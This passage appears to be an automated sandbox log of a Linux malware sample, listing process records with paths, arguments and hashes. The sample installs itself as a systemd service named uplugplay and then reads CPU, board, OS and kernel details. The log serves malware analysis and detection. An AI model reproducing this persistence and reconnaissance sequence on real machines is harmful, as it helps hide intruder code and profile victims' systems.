                                              MD5 hash:bce23a57891f9ad0dfbde06b00de2b93

                                              Start time:01:21:51
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:sh -c "pgrep uplugplay"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:21:51
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:n/a
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:21:51
                                              Start date:26/01/2022
                                              Path:/usr/bin/pgrep
                                              Arguments:pgrep uplugplay
                                              File size:30968 bytes
                                              MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                              Start time:01:21:52
                                              Start date:26/01/2022
                                              Path:/tmp/zJ4GNlikaw
                                              Arguments:n/a
                                              File size:426540 bytes
                                              MD5 hash:bce23a57891f9ad0dfbde06b00de2b93

                                              Start time:01:21:52
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:sh -c "pidof uplugplay"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:21:52
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:n/a
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:21:52
                                              Start date:26/01/2022
                                              Path:/usr/bin/pidof
                                              Arguments:pidof uplugplay
                                              File size:27016 bytes
                                              MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                                              Start time:01:21:53
                                              Start date:26/01/2022
                                              Path:/tmp/zJ4GNlikaw
                                              Arguments:n/a
                                              File size:426540 bytes
                                              MD5 hash:bce23a57891f9ad0dfbde06b00de2b93

                                              Start time:01:21:53
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:sh -c "pgrep upnpsetup"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:21:53
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:n/a
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:21:53
                                              Start date:26/01/2022
                                              Path:/usr/bin/pgrep
                                              Arguments:pgrep upnpsetup
                                              File size:30968 bytes
                                              MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                              Start time:01:21:54
                                              Start date:26/01/2022
                                              Path:/tmp/zJ4GNlikaw
                                              Arguments:n/a
                                              File size:426540 bytes
                                              MD5 hash:bce23a57891f9ad0dfbde06b00de2b93

                                              Start time:01:21:54
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:sh -c "pidof upnpsetup"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:21:54
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:n/a
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:21:54
                                              Start date:26/01/2022
                                              Path:/usr/bin/pidof
                                              Arguments:pidof upnpsetup
                                              File size:27016 bytes
                                              MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                                              Start time:01:21:57
                                              Start date:26/01/2022
                                              Path:/tmp/zJ4GNlikaw
                                              Arguments:n/a
                                              File size:426540 bytes
                                              MD5 hash:bce23a57891f9ad0dfbde06b00de2b93

                                              Start time:01:21:57
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:sh -c "systemctl daemon-reload"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:21:57
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:n/a
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:21:57
                                              Start date:26/01/2022
                                              Path:/usr/bin/systemctl
                                              Arguments:systemctl daemon-reload
                                              File size:996584 bytes
                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                              Start time:01:21:59
                                              Start date:26/01/2022
                                              Path:/tmp/zJ4GNlikaw
                                              Arguments:n/a
                                              File size:426540 bytes
                                              MD5 hash:bce23a57891f9ad0dfbde06b00de2b93

                                              Start time:01:21:59
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:sh -c "systemctl enable uplugplay.service"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:21:59
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:n/a
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:21:59
                                              Start date:26/01/2022
                                              Path:/usr/bin/systemctl
                                              Arguments:systemctl enable uplugplay.service
                                              File size:996584 bytes
                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                              Start time:01:22:01
                                              Start date:26/01/2022
                                              Path:/tmp/zJ4GNlikaw
                                              Arguments:n/a
                                              File size:426540 bytes
                                              MD5 hash:bce23a57891f9ad0dfbde06b00de2b93

                                              Start time:01:22:01
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:sh -c "systemctl start uplugplay.service"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:22:01
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:n/a
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:22:01
                                              Start date:26/01/2022
                                              Path:/usr/bin/systemctl
                                              Arguments:systemctl start uplugplay.service
                                              File size:996584 bytes
                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                              Start time:01:21:57
                                              Start date:26/01/2022
                                              Path:/usr/lib/systemd/systemd
                                              Arguments:n/a
                                              File size:1620224 bytes
                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                              Start time:01:21:57
                                              Start date:26/01/2022
                                              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                              File size:22760 bytes
                                              MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                              Start time:01:22:01
                                              Start date:26/01/2022
                                              Path:/usr/lib/systemd/systemd
                                              Arguments:n/a
                                              File size:1620224 bytes
                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                              Start time:01:22:01
                                              Start date:26/01/2022
                                              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                              File size:22760 bytes
                                              MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                              Start time:01:22:03
                                              Start date:26/01/2022
                                              Path:/usr/lib/systemd/systemd
                                              Arguments:n/a
                                              File size:1620224 bytes
                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                              Start time:01:22:03
                                              Start date:26/01/2022
                                              Path:/usr/sbin/uplugplay
                                              Arguments:/usr/sbin/uplugplay
                                              File size:426540 bytes
                                              MD5 hash:bce23a57891f9ad0dfbde06b00de2b93

                                              Start time:01:22:03
                                              Start date:26/01/2022
                                              Path:/usr/sbin/uplugplay
                                              Arguments:n/a
                                              File size:426540 bytes
                                              MD5 hash:bce23a57891f9ad0dfbde06b00de2b93

                                              Start time:01:22:03
                                              Start date:26/01/2022
                                              Path:/usr/sbin/uplugplay
                                              Arguments:n/a
                                              File size:426540 bytes
                                              MD5 hash:bce23a57891f9ad0dfbde06b00de2b93

                                              Start time:01:22:03
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:sh -c "/usr/sbin/uplugplay -Dcomsvc"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:22:03
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:n/a
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:22:03
                                              Start date:26/01/2022
                                              Path:/usr/sbin/uplugplay
                                              Arguments:/usr/sbin/uplugplay -Dcomsvc
                                              File size:426540 bytes
                                              MD5 hash:bce23a57891f9ad0dfbde06b00de2b93

                                              Start time:01:22:10
                                              Start date:26/01/2022
                                              Path:/usr/sbin/uplugplay
                                              Arguments:n/a
                                              File size:426540 bytes
                                              MD5 hash:bce23a57891f9ad0dfbde06b00de2b93

                                              Start time:01:22:10
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:sh -c "cat /proc/cpuinfo"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:22:10
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:n/a
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:22:10
                                              Start date:26/01/2022
                                              Path:/usr/bin/cat
                                              Arguments:cat /proc/cpuinfo
                                              File size:43416 bytes
                                              MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                              Start time:01:22:10
                                              Start date:26/01/2022
                                              Path:/usr/sbin/uplugplay
                                              Arguments:n/a
                                              File size:426540 bytes
                                              MD5 hash:bce23a57891f9ad0dfbde06b00de2b93

                                              Start time:01:22:10
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:sh -c "dmidecode --type baseboard"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:22:10
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:n/a
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:22:10
                                              Start date:26/01/2022
                                              Path:/usr/sbin/dmidecode
                                              Arguments:dmidecode --type baseboard
                                              File size:121856 bytes
                                              MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                              Start time:01:22:10
                                              Start date:26/01/2022
                                              Path:/usr/sbin/uplugplay
                                              Arguments:n/a
                                              File size:426540 bytes
                                              MD5 hash:bce23a57891f9ad0dfbde06b00de2b93

                                              Start time:01:22:10
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:sh -c "dmidecode --type baseboard"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:22:10
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:n/a
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:22:10
                                              Start date:26/01/2022
                                              Path:/usr/sbin/dmidecode
                                              Arguments:dmidecode --type baseboard
                                              File size:121856 bytes
                                              MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                              Start time:01:22:10
                                              Start date:26/01/2022
                                              Path:/usr/sbin/uplugplay
                                              Arguments:n/a
                                              File size:426540 bytes
                                              MD5 hash:bce23a57891f9ad0dfbde06b00de2b93

                                              Start time:01:22:10
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:sh -c "dmidecode --type baseboard"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:22:11
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:n/a
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:22:11
                                              Start date:26/01/2022
                                              Path:/usr/sbin/dmidecode
                                              Arguments:dmidecode --type baseboard
                                              File size:121856 bytes
                                              MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                              Start time:01:22:11
                                              Start date:26/01/2022
                                              Path:/usr/sbin/uplugplay
                                              Arguments:n/a
                                              File size:426540 bytes
                                              MD5 hash:bce23a57891f9ad0dfbde06b00de2b93

                                              Start time:01:22:11
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:sh -c "dmidecode --type baseboard"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:22:11
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:n/a
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:22:11
                                              Start date:26/01/2022
                                              Path:/usr/sbin/dmidecode
                                              Arguments:dmidecode --type baseboard
                                              File size:121856 bytes
                                              MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                              Start time:01:22:11
                                              Start date:26/01/2022
                                              Path:/usr/sbin/uplugplay
                                              Arguments:n/a
                                              File size:426540 bytes
                                              MD5 hash:bce23a57891f9ad0dfbde06b00de2b93

                                              Start time:01:22:11
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:sh -c "dmidecode --type baseboard"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:22:11
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:n/a
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:22:11
                                              Start date:26/01/2022
                                              Path:/usr/sbin/dmidecode
                                              Arguments:dmidecode --type baseboard
                                              File size:121856 bytes
                                              MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                              Start time:01:22:11
                                              Start date:26/01/2022
                                              Path:/usr/sbin/uplugplay
                                              Arguments:n/a
                                              File size:426540 bytes
                                              MD5 hash:bce23a57891f9ad0dfbde06b00de2b93

                                              Start time:01:22:11
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:sh -c "dmidecode --type baseboard"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:22:11
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:n/a
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:22:11
                                              Start date:26/01/2022
                                              Path:/usr/sbin/dmidecode
                                              Arguments:dmidecode --type baseboard
                                              File size:121856 bytes
                                              MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                              Start time:01:22:11
                                              Start date:26/01/2022
                                              Path:/usr/sbin/uplugplay
                                              Arguments:n/a
                                              File size:426540 bytes
                                              MD5 hash:bce23a57891f9ad0dfbde06b00de2b93

                                              Start time:01:22:11
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:sh -c dmidecode
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:22:11
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:n/a
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:22:11
                                              Start date:26/01/2022
                                              Path:/usr/sbin/dmidecode
                                              Arguments:dmidecode
                                              File size:121856 bytes
                                              MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                              Start time:01:22:12
                                              Start date:26/01/2022
                                              Path:/usr/sbin/uplugplay
                                              Arguments:n/a
                                              File size:426540 bytes
                                              MD5 hash:bce23a57891f9ad0dfbde06b00de2b93

                                              Start time:01:22:12
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:sh -c "cat /etc/os-release"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:22:12
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:n/a
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:22:12
                                              Start date:26/01/2022
                                              Path:/usr/bin/cat
                                              Arguments:cat /etc/os-release
                                              File size:43416 bytes
                                              MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                              Start time:01:22:13
                                              Start date:26/01/2022
                                              Path:/usr/sbin/uplugplay
                                              Arguments:n/a
                                              File size:426540 bytes
                                              MD5 hash:bce23a57891f9ad0dfbde06b00de2b93

                                              Start time:01:22:13
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:sh -c uptime
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:22:13
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:n/a
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:22:13
                                              Start date:26/01/2022
                                              Path:/usr/bin/uptime
                                              Arguments:uptime
                                              File size:14568 bytes
                                              MD5 hash:3ad70d8e33316ac713bf25c2ddf2fb14

                                              Start time:01:22:13
                                              Start date:26/01/2022
                                              Path:/usr/sbin/uplugplay
                                              Arguments:n/a
                                              File size:426540 bytes
                                              MD5 hash:bce23a57891f9ad0dfbde06b00de2b93

                                              Start time:01:22:13
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:sh -c "uname -a"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:22:13
                                              Start date:26/01/2022
                                              Path:/bin/sh
                                              Arguments:n/a
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time:01:22:13
                                              Start date:26/01/2022
                                              Path:/usr/bin/uname
                                              Arguments:uname -a
                                              File size:39288 bytes
                                              MD5 hash:4ac7c634c5bec95753c480e9d421dcc2